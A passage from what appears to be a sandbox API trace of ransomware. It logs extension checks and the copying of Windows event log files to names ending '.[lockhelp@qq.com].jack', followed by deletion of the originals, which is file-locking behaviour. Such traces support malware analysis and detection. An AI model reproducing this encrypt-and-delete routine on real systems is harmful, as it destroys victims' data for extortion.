returned -1 [0207.255] lstrlenW (lpString=".xlsx") returned 5 [0207.255] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.257] lstrlenW (lpString=".ppt") returned 4 [0207.257] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.257] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0207.257] lstrlenW (lpString=".zip") returned 4 [0207.257] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.257] lstrlenW (lpString=".rar") returned 4 [0207.257] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.257] lstrlenW (lpString=".bz2") returned 4 [0207.257] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.257] lstrlenW (lpString=".7z") returned 3 [0207.257] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.257] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0207.257] lstrlenW (lpString=".dbf") returned 4 [0207.257] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.257] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0207.257] lstrlenW (lpString=".1cd") returned 4 [0207.258] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.258] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0207.258] lstrlenW (lpString=".jpg") returned 4 [0207.258] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.258] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0207.258] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0207.258] lstrlenW (lpString=".doc") returned 4 [0207.258] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.258] lstrlenW (lpString=".docx") returned 5 [0207.258] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.258] lstrlenW (lpString=".pdf") returned 4 [0207.258] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.258] lstrlenW (lpString=".xls") returned 4 [0207.258] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.258] lstrlenW (lpString=".xlsx") returned 5 [0207.258] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.258] lstrlenW (lpString=".ppt") returned 4 [0207.258] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.258] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0207.258] lstrlenW (lpString=".zip") returned 4 [0207.258] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.258] lstrlenW (lpString=".rar") returned 4 [0207.259] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.259] lstrlenW (lpString=".bz2") returned 4 [0207.259] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.259] lstrlenW (lpString=".7z") returned 3 [0207.259] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.259] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0207.259] lstrlenW (lpString=".dbf") returned 4 [0207.259] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.259] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0207.259] lstrlenW (lpString=".1cd") returned 4 [0207.259] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.259] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0207.259] lstrlenW (lpString=".jpg") returned 4 [0207.259] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.259] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0207.259] lstrlenW (lpString="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 48 [0207.259] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0207.262] GetFileSizeEx (in: hFile=0x424, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=69632) returned 1 [0207.262] CloseHandle (hObject=0x424) returned 1 [0207.262] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx")) returned 0x20 [0207.262] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0207.263] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0207.263] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0207.263] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0207.263] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0207.263] GetLastError () returned 0x0 [0207.263] ReadFile (in: hFile=0x424, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0207.279] WriteFile (in: hFile=0x3ec, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0207.281] ReadFile (in: hFile=0x424, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0207.281] WriteFile (in: hFile=0x3ec, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x134, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x134, lpOverlapped=0x0) returned 1 [0207.281] SetEndOfFile (hFile=0x3ec) returned 1 [0207.281] CloseHandle (hObject=0x3ec) returned 1 [0207.284] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0207.284] SetEndOfFile (hFile=0x424) returned 1 [0207.286] CloseHandle (hObject=0x424) returned 1 [0207.286] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0207.286] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx")) returned 1 [0207.286] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0207.286] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0207.286] lstrlenW (lpString=".doc") returned 4 [0207.286] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.287] lstrlenW (lpString=".docx") returned 5 [0207.287] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.287] lstrlenW (lpString=".pdf") returned 4 [0207.287] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.287] lstrlenW (lpString=".xls") returned 4 [0207.287] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.287] lstrlenW (lpString=".xlsx") returned 5 [0207.287] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.287] lstrlenW (lpString=".ppt") returned 4 [0207.287] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.287] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0207.287] lstrlenW (lpString=".zip") returned 4 [0207.287] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.287] lstrlenW (lpString=".rar") returned 4 [0207.287] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.287] lstrlenW (lpString=".bz2") returned 4 [0207.287] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.287] lstrlenW (lpString=".7z") returned 3 [0207.287] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.287] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0207.287] lstrlenW (lpString=".dbf") returned 4 [0207.287] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.287] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0207.287] lstrlenW (lpString=".1cd") returned 4 [0207.287] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.287] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0207.287] lstrlenW (lpString=".jpg") returned 4 [0207.287] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.288] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0207.288] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0207.288] lstrlenW (lpString=".doc") returned 4 [0207.288] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.288] lstrlenW (lpString=".docx") returned 5 [0207.288] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.288] lstrlenW (lpString=".pdf") returned 4 [0207.288] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.288] lstrlenW (lpString=".xls") returned 4 [0207.288] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.288] lstrlenW (lpString=".xlsx") returned 5 [0207.288] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.288] lstrlenW (lpString=".ppt") returned 4 [0207.288] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.288] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0207.288] lstrlenW (lpString=".zip") returned 4 [0207.288] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.288] lstrlenW (lpString=".rar") returned 4 [0207.288] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.288] lstrlenW (lpString=".bz2") returned 4 [0207.288] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.288] lstrlenW (lpString=".7z") returned 3 [0207.288] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.288] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0207.288] lstrlenW (lpString=".dbf") returned 4 [0207.288] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.288] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0207.288] lstrlenW (lpString=".1cd") returned 4 [0207.289] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.289] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 56 [0207.289] lstrlenW (lpString=".jpg") returned 4 [0207.289] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.289] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0207.289] lstrlenW (lpString="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 78 [0207.289] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0207.289] GetFileSizeEx (in: hFile=0x424, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=1052672) returned 1 [0207.289] CloseHandle (hObject=0x424) returned 1 [0207.290] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx")) returned 0x20 [0207.290] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0207.290] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0207.290] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0207.290] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0207.290] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0207.290] GetLastError () returned 0x0 [0207.291] ReadFile (in: hFile=0x424, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0xffff0, lpOverlapped=0x0) returned 1 [0207.516] WriteFile (in: hFile=0x3ec, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0xffff0, lpOverlapped=0x0) returned 1 [0207.579] ReadFile (in: hFile=0x424, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x1010, lpOverlapped=0x0) returned 1 [0207.586] WriteFile (in: hFile=0x3ec, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x1020, lpOverlapped=0x0) returned 1 [0207.589] ReadFile (in: hFile=0x424, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0207.590] WriteFile (in: hFile=0x3ec, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x170, lpOverlapped=0x0) returned 1 [0207.590] SetEndOfFile (hFile=0x3ec) returned 1 [0207.590] CloseHandle (hObject=0x3ec) returned 1 [0207.708] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0207.708] SetEndOfFile (hFile=0x424) returned 1 [0207.709] CloseHandle (hObject=0x424) returned 1 [0207.709] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0207.709] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx")) returned 1 [0208.561] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0208.561] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0208.562] lstrlenW (lpString=".doc") returned 4 [0208.562] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0208.562] lstrlenW (lpString=".docx") returned 5 [0208.562] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0208.562] lstrlenW (lpString=".pdf") returned 4 [0208.562] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0208.562] lstrlenW (lpString=".xls") returned 4 [0208.562] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0208.562] lstrlenW (lpString=".xlsx") returned 5 [0208.562] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0208.562] lstrlenW (lpString=".ppt") returned 4 [0208.562] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0208.562] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0208.562] lstrlenW (lpString=".zip") returned 4 [0208.562] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0208.562] lstrlenW (lpString=".rar") returned 4 [0208.562] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0208.562] lstrlenW (lpString=".bz2") returned 4 [0208.562] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0208.562] lstrlenW (lpString=".7z") returned 3 [0208.562] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0208.562] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0208.562] lstrlenW (lpString=".dbf") returned 4 [0208.562] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0208.562] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0208.562] lstrlenW (lpString=".1cd") returned 4 [0208.562] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0208.562] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0208.563] lstrlenW (lpString=".jpg") returned 4 [0208.563] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0208.563] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0208.563] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0208.563] lstrlenW (lpString=".doc") returned 4 [0208.563] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0208.563] lstrlenW (lpString=".docx") returned 5 [0208.563] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0208.563] lstrlenW (lpString=".pdf") returned 4 [0208.563] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0208.563] lstrlenW (lpString=".xls") returned 4 [0208.563] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0208.563] lstrlenW (lpString=".xlsx") returned 5 [0208.563] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0208.563] lstrlenW (lpString=".ppt") returned 4 [0208.563] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0208.563] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0208.563] lstrlenW (lpString=".zip") returned 4 [0208.563] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0208.563] lstrlenW (lpString=".rar") returned 4 [0208.563] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0208.563] lstrlenW (lpString=".bz2") returned 4 [0208.563] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0208.563] lstrlenW (lpString=".7z") returned 3 [0208.563] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0208.563] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0208.563] lstrlenW (lpString=".dbf") returned 4 [0208.564] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0208.564] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0208.564] lstrlenW (lpString=".1cd") returned 4 [0208.564] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0208.564] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0208.564] lstrlenW (lpString=".jpg") returned 4 [0208.564] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0208.564] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0208.564] lstrlenW (lpString="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 51 [0208.564] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0208.779] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=69632) returned 1 [0208.779] CloseHandle (hObject=0x420) returned 1 [0208.779] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx")) returned 0x20 [0208.779] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0208.779] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0208.779] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0208.780] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0208.780] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0208.783] GetLastError () returned 0x0 [0208.783] ReadFile (in: hFile=0x420, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0208.786] WriteFile (in: hFile=0x41c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0208.788] ReadFile (in: hFile=0x420, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0208.788] WriteFile (in: hFile=0x41c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x13a, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x13a, lpOverlapped=0x0) returned 1 [0208.788] SetEndOfFile (hFile=0x41c) returned 1 [0208.788] CloseHandle (hObject=0x41c) returned 1 [0208.791] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0208.791] SetEndOfFile (hFile=0x420) returned 1 [0208.792] CloseHandle (hObject=0x420) returned 1 [0208.792] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0208.793] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx")) returned 1 [0208.793] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0208.793] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0208.793] lstrlenW (lpString=".doc") returned 4 [0208.793] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0208.793] lstrlenW (lpString=".docx") returned 5 [0208.793] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0208.793] lstrlenW (lpString=".pdf") returned 4 [0208.793] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0208.793] lstrlenW (lpString=".xls") returned 4 [0208.793] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0208.793] lstrlenW (lpString=".xlsx") returned 5 [0208.793] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 